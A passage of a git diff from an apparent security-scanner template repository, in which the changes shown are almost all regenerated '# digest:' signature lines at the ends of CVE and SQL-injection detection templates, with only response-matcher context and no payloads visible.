http/cves/2023/CVE-2023-27847.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-3077.yaml | 2 +- http/cves/2023/CVE-2023-34751.yaml | 2 +- http/cves/2023/CVE-2023-34752.yaml | 2 +- http/cves/2023/CVE-2023-34753.yaml | 2 +- http/cves/2023/CVE-2023-34754.yaml | 2 +- http/cves/2023/CVE-2023-34755.yaml | 2 +- http/cves/2023/CVE-2023-34756.yaml | 2 +- http/cves/2023/CVE-2023-36284.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39650.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-45375.yaml | 2 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-48084.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-6063.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1512.yaml | 2 +- http/cves/2024/CVE-2024-1698.yaml | 2 +- http/cves/2024/CVE-2024-2621.yaml | 2 +- http/cves/2024/CVE-2024-27956.yaml | 2 +- http/cves/2024/CVE-2024-2876.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 2 +- http/cves/2024/CVE-2024-3552.yaml | 2 +- http/cves/2024/CVE-2024-36412.yaml | 2 +- http/cves/2024/CVE-2024-3656.yaml | 2 ++ http/cves/2024/CVE-2024-36683.yaml | 2 +- http/cves/2024/CVE-2024-3922.yaml | 2 +- http/cves/2024/CVE-2024-4257.yaml | 2 +- http/cves/2024/CVE-2024-4295.yaml | 2 +- http/cves/2024/CVE-2024-43917.yaml | 2 +- http/cves/2024/CVE-2024-4443.yaml | 2 +- http/cves/2024/CVE-2024-46310.yaml | 3 +-- http/cves/2024/CVE-2024-5765.yaml | 2 +- http/cves/2024/CVE-2024-5975.yaml | 2 +- http/cves/2024/CVE-2024-6028.yaml | 2 +- http/cves/2024/CVE-2024-6159.yaml | 2 +- http/cves/2024/CVE-2024-6205.yaml | 2 +- http/cves/2024/CVE-2024-6924.yaml | 2 +- http/cves/2024/CVE-2024-6926.yaml | 2 +- http/cves/2024/CVE-2024-6928.yaml | 2 +- http/cves/2024/CVE-2024-7188.yaml | 2 +- http/cves/2024/CVE-2024-7854.yaml | 2 +- http/cves/2024/CVE-2024-8484.yaml | 2 +- http/cves/2024/CVE-2024-8503.yaml | 2 +- http/cves/2024/CVE-2024-8522.yaml | 2 +- http/cves/2024/CVE-2024-8698.yaml | 2 ++ http/cves/2024/CVE-2024-9465.yaml | 2 +- http/default-logins/zebra/zebra-printer-default-login.yaml | 3 +-- http/exposed-panels/freescout-panel.yaml | 2 ++ http/exposed-panels/sqlpad-panel.yaml | 3 +-- http/exposed-panels/usermin-panel.yaml | 3 +-- http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml | 2 +- http/vulnerabilities/other/applezeed-sqli.yaml | 3 +-- http/vulnerabilities/other/azon-dominator-sqli.yaml | 2 +- http/vulnerabilities/other/csz-cms-sqli.yaml | 3 +-- http/vulnerabilities/other/ecology-oa-file-sqli.yaml | 2 +- http/vulnerabilities/other/fumengyun-sqli.yaml | 2 +- http/vulnerabilities/other/groomify-sqli.yaml | 3 +-- http/vulnerabilities/other/opencart-core-sqli.yaml | 2 +- http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +- http/vulnerabilities/other/pmb-sqli.yaml | 2 +- http/vulnerabilities/other/readymade-unilevel-sqli.yaml | 2 +- http/vulnerabilities/other/sitemap-sql-injection.yaml | 2 +- http/vulnerabilities/other/stackposts-sqli.yaml | 2 +- .../prestashop/prestashop-apmarketplace-sqli.yaml | 2 +- http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 2 +- http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml | 3 +-- .../wordpress/advanced-booking-calendar-sqli.yaml | 3 +-- .../vulnerabilities/wordpress/leaguemanager-sql-injection.yaml | 3 +-- http/vulnerabilities/wordpress/notificationx-sqli.yaml | 3 +-- http/vulnerabilities/wordpress/wp-adivaha-sqli.yaml | 3 +-- .../wordpress/wp-autosuggest-sql-injection.yaml | 2 +- http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml | 3 +-- http/vulnerabilities/wordpress/wp-statistics-sqli.yaml | 2 +- http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml | 3 +-- http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml | 2 +- http/vulnerabilities/yonyou/yonyou-ufida-nc-cloud-sqli.yaml | 2 +- 177 files changed, 180 insertions(+), 189 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index b8b8e9085c..c37915428a 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -48,5 +48,4 @@ http: - type: dsl dsl: - "duration>=7 && duration <=16" - -# digest: 4b0a00483046022100e8266a692ff2cc477215800d03fea01da4bb13c82251996b57ef4a6fc6ba63d702210095cfc9e092e7375b414bc41745d4954bf5ef0de6117040a43f83e63ebd7b7d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202529d892c477e15738b4e5537c797e61478cb79afff398f2dc90fca1769751960221009f10ae4d72053768a125dfa0aa2497b24e5150a453c8536c0cea34d4e5d4a5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index ed7c850053..5b4a50f08a 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d0d1de19b601f462ee58d28e0503bb93bcc23d3e3718449465cc90430ed0dde502205ce2cf1f373b2d5de5bb045a0506585f59b2f45bc8670208d0640382a01cabdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 9d794d0b98..d9e86f96b4 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -52,4 +52,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e0252d78abb451e9b3508dd9733adb456ea9f5a41268037aef0e6eca1d4303320220554bd533cd1baab8aad20fc9f3dccb5a319b328b480a6f029363115b7922cc20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml index 6270ea9bf4..720ebf0353 100644 --- a/http/cves/2015/CVE-2015-9323.yaml +++ b/http/cves/2015/CVE-2015-9323.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 4b0a00483046022100c27236f98002c3fa3feb31b6084010a0885416d66e5f558006f1e087f2c42369022100de53fe3a0f1b9880b34c9db76ee96cd7e8fe47827ba3e6701ed0c0cd911b5942:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e6e7dd877da87520e9728b32f5386752ac86d0582b6f4dec906e323cb09ab04022027471d6a5d1e20347d22983a5ed786ef95ba57cc750709594d63b455212bd279:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-16159.yaml b/http/cves/2018/CVE-2018-16159.yaml index 91c8fc1502..7bab523184 100644 --- a/http/cves/2018/CVE-2018-16159.yaml +++ b/http/cves/2018/CVE-2018-16159.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 490a00463044022039c62ea7189c856952f0a35cfb1c5bcc09fd83a4aae6a766e8357ce6c29625e202204b8b8f1561357042ae671f4d7d5166f074ce46d7d8586fb02316afdd260df3bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e13c5de79aecef68dd8703a19cad639b46d46ac326ba001f9984084c5080fd0a022100a4e65fde4fa3b8c1d7d197d9f04ea147e94caf0ef409a54f4ced1916f0ed4578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 575f49f6fc..4894740e42 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -54,4 +54,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 4a0a00473045022100ec573b18c670d29560ed71dcf93443f68e034fce66f06294bf0b23aeadb462e1022003bfb3d3de007d87998765d3ec871ac5efff191cf95c1a2f148e89d9a66816d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220350b85c022a2f7990b3549695690835a5a3c0eca188c61a231dcdbc042bacc8c0220182ccd815189f39984575638fc122b9947b072a99b8d98e22dec0d524e4ca452:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index ad84f7912e..35ad33efb2 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -83,4 +83,4 @@ http: - 'status_code_2 == 200 && status_code_3 == 400' - 'len(body_2) == 2 && len(body_3) == 2' condition: and -# digest: 4a0a0047304502205a69b6ef9b1728b6a46cb23445d714f64558e680f3e39937cb4d3800f7c59669022100f12e75e00939482a564c76ed2fdcc3b2319eccdce9539afd2805c5a4353a4a35:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a80a39e0c4a72d86fae82b5e46b7e70f22b03fbc5b52f694ca36560f81946c520220015ed98158a92faf65ae029e01eec1e7962bbb7273ee01c02c0ceffbcadd34c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 0bfa32caff..a1462d8f93 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/javascript")' - 'contains(body, "$(document).ready(function()")' condition: and -# digest: 4a0a00473045022100cf4f7ac39414a286782cc1465b2e846928bf6384fd900c4b102cef03995c8496022013ce04ef0b306d3248491918201ad410693f3e67d90d2b836a6faf942e301aa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206abae22800a03afe90c44ef6d3705a376f5aaa027225e4c7b4e7bed52864aaab022019592374fb3278a65252f94f4caabd678d0a98eb3d6e2ed59d8cfa4cf4d677e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 8a1ac8b7f0..dfda6d3bfb 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -65,4 +65,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 490a0046304402204c4bf6a24a18789f4b4c053b1ede99fad9d47bbe442a41be6d1ff8f46e32a011022050174e6bebe598ce43b4b667f73bc6aad238238abed9332fd136e43b4feaa386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015d2201ff7a238aea6a71fe1375f8a1d608ec867a5f3956aea11a30fda642da802206370686dc03f6b7ea9742a3c1fa820d9559a43cd8ca463171ff0036b27f8eb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 7400462488..ab92241c30 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -46,4 +46,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and -# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba36b4b1b8b3de0a170016e0df7dc4bc129a2a432a66313495e10a2c5726b0220220641950cb27c6dfd36692ed81dc14d36385dc86e8b2c553c218672acb507375ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 9552ef2aa3..b83996bf12 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -46,4 +46,4 @@ http: - "status_code == 200" - "contains(body, 'goodlayers-lms') || contains(body, 'goodlms')" condition: and -# digest: 4a0a00473045022100de8e68d9f94b82af184c4830778f5a38d929abe4ad7c1b9a60ab64389a0adf0102200abfa6c9701dce38f221abae9f7130bf100efa9f0c5232356ad4a034340561b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047ea54dad2e6f0b6e744ccaadbbb117fa2e46dcae0344ab5e33cfa881be486ab02210083f8497ca49054443bbd084df6eeeae0ba2a9f33a3453d8ce97fdc9b778b3265:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 089c11ab29..42e26ce67f 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -56,4 +56,4 @@ http: - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and -# digest: 4a0a00473045022100f81cc6ae63a3716745a9d2b7b36392e91421d0e2429ef59ea0be12290d02643302204e0b0cd1ce6bc440c4c53e079c3bc7406fc60f36b6f79cf10bce774aee58942d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100accee4cf0582472a2200204cfef2221077c1dd6d3e58bfda460c7b81d553085902210099ae808f6eb88442a9b53e94eeb038b7af80d4962258bcde5adb7308ee95d052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 841b736b80..88650fe386 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -48,4 +48,4 @@ http: - 'status_code == 200' - 'contains_all(body, "{\"answer_name", "vote\":")' condition: and -# digest: 4a0a0047304502203414f57b4fe1500e69a1e44d86edb4c318855b78e1113d2423dd48e3a6931a04022100f3d562735c04bf9943dbdfb808ebfa20790e58f4c6f5643d8c89eb10e12c69e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcb435610780d47753f97f6a5e59252f21a24518ce51b148b16b50d1090de4b5022100bb68a6f6afb34ccd43ff058d18ec33757aa803d16002f94b456d592a899644ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index 3d3cbc0d03..6108133c3d 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 4b0a00483046022100b092e95ed6c8648f9314bf91ab75d65da7ed441e0f53438cb2f29fef0b3fc15d022100ad4c2f079591cb0fd9d7d2c4072ef01d722fee1c9c8e7385c0669f87453932c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022077c870303c44c07b438aa81a4bd842ebd26edc6163c3f19b6b0a3644e52f29cf0220472a02deab2f4c650074d0812c4bd9ebe923480459f4dc9986538698ddcbd18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index 6ef9fa9248..c9dabb40b2 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "User credentials are invalid.")' condition: and -# digest: 4b0a00483046022100fb5b4e734fba05c09c1c094c94b84b400b14dcba5ef57448829d5b5d3016005a022100d239aadd95068d42bf67a4af289a4912b7ae0c574f6d7a721d993912ffcfd81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220043db5a1aa38db15da9b83bb8888849fc550589571bc4bc7d844e9973d7fa55e02201190ffe889da257be06b7a2163a9ae780b47f5fea107aae6867c33a7b0959243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index c1dfcdada3..05e217c6e0 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 404 -# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b8f505cf063a366677aff951ab3ac77b7a042733ab630621041ce8512afdfeb022100e3629201f4d6f5c29d073a6f5fe6e1ab99e571c0fc9b1f9d00dc70fc9c6ebcc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24791.yaml b/http/cves/2021/CVE-2021-24791.yaml index b761dd7eea..f3e35fdea5 100644 --- a/http/cves/2021/CVE-2021-24791.yaml +++ b/http/cves/2021/CVE-2021-24791.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2,"Add New Snippet")' condition: and -# digest: 4a0a0047304502210095714900b273532b79c9b68b4b7daad27ed4f8b54d5e90deef7d4e7820dc084702206369f1b610cf19a0d46bf27a00db0246bcaf269e93d481a69a1d44812064a241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022045af518596bfcb30054d6f0284c6a3806c58e62a6faf3c250299f5fbfb448b06022058a760ac3ffc7cc75ea58c8bcde760ee3fbfbc63ea5bb88bc6338c1f2157a493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index 8f76f4e871..85dc23078b 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "asgarosforum")' condition: and -# digest: 4b0a00483046022100f0bde1de52443d3ddd17e9f337ab1944196721460c9f115b112be0cae1ccf101022100ea65d1cc352cc3a866999d55ce3fe60120bf86c60e25d1b34ce21d6e1997a677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8fd318ec87896aa55d82aafa093ed264a5ff5bf3d9be27458a435d3879e0ff8022100f73122c01a76630add3c2933188f4783e3f2ab0d301451748ab013bdc3fb7971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index 7fb3d40998..b03e1a5a8d 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -68,4 +68,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f32bfb982d6b9ecf94822be9dda7549ba4b23cb290e4a01e636d46c7fe1fab8c0221008f0b3e8572758ce4a02c5101fcc49055884f2f6305b017bc1468bb213fdc8e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index ba2aca3af6..683edf35b4 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -54,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4a0a00473045022100e094ec14b2add716b2cc645857d709bbe7216d825cb1b18ce5b7733457860e2c02206859da8890901f7219e49f41586f721cfc4c7b1adfb4768948e8eaf03da4ba26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010a1241115e4534524145899ea6c8c560ba03ecb8a7562b81aea23abb010510e022023d95ae5fe85c8e4f30b630405b2f4698f59916a79a815573c68e139bc1c2ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 68906246e1..6bc11bf86d 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -45,4 +45,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"status\":true")' condition: and -# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbcac16e6b972a8c13c9203a2eefab2763405a60eeac14738446293105ddcd85022100af007241e9719b7a25b44ede01a84b75fd606f0d58375c6b77f3a50f8a4dfabb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 16d75723d3..0356724cdc 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and -# digest: 4b0a00483046022100baf26aa77d293a650d638df6fa36214c0344ec2c80457d29c0cec194f81aa415022100ab4c0c9979d914df0d42b4b1c65aae34aff3194e9127bdf1aa5c9d1fed8fdf11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207bcb83ddc3ca2854b007d61bfce62f3e96e14119f6eb4798a2eec83b287fe9ff022100cccabc9e7b99444bfa23b3badaac419c8f3ee16951c27ecf13165a4892fe6d5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 59727388a7..56965d2546 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and -# digest: 490a00463044022005a0ed6fd4a954f355471debb3135a50f8aa1fc8f46d755cdf7ec6fbad2ebb11022005f3d8ac225181d1a9a4a8514d1810eb4fee21dc685447ccceea3418b5f6a24c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ad6223a657a0318d15e4003c38dce2d9781705d2d06f7f50a4e8a372cf24f5f02200cfe153e0bd8c4ee1258e08ce63c0041c0faaddafca973ee4d272d4db3530b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index 9e12f13a1e..708fb16bdb 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -54,4 +54,4 @@ http: - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and -# digest: 4a0a0047304502210080b4fd1ea8002928950a4be85999cc9bb3e3d35dd99ca34564c39556ae1544b002207c4249f959342254d0c492ed59ccd668a4925e63f456d78f2483e98a274c11b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d93679fda0ec3270f9aee76d52bf8e1ca48f00c51c65e7ead923cf9754051f3f02207f42cd9a38d4ccdc79c2d046b8a65f80379192372894f7c36a41c1072e0f7c51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index b1de16854f..f99a683b8a 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and -# digest: 4b0a00483046022100b913f246ed52547b6cf8d38eeb886a9c8e6ccdfd54a5fb9dfed931be1b37c98e022100f1d8901f4edf04df3a1e544f734cd3941996ac96dc7776e05744fcacf027eac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200282e1486bd120a0f9c250940fd4924b958940ec669b60c7119709378b704265022100c7886cb6efe4950af5d454aff9e4fd05c0e5c757f09ae284b4f7d40d1d178d6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 4f1f4a65e8..2e171617df 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Doctor Appoinment System")' condition: and -# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a413cfe8323f7b60e6d44eef643b270bce02d1a7d91553da330fa3d256b4f06022100d25274ea18a85655e67d4612c0615304e37f1047e76c2e150aea74baafdd8a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 87ea96e55a..a125c89bf4 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a004730450220608993eb6c162f41af6eca78ee5e37966f90692f167c67e2f39623c90a6af11d022100bab80bd88b7acfd20895fdd9f38e249825760da11586f3cb851af29d59def924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2cf3abe851fb2c16b60644bcc286522bbe51cc52155a0079a02e25595c667ca02200df7ed25d96d01b78bd1b26e3c448e057d73fea56e2e06342982e2008e85eaae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index c080e0ba9b..7ee062ce58 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202846631256391e911fe49c920be9b5c69fc171b1f19ad1ba982bdb67a2289b310220640c20f73f5c1f529fac4607b62fda57411a3ea82d53f2b4c0bf6d284926e49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 7e032e4ae8..16644ee2ef 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4b0a004830460221009797e9869eb4d890a89391acc0795035af747ff5958931398e1e077d3f751e79022100d9e31261c293f7762348e4477ec1478a4f49a059fc8e4f1f513e7cfb025edb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 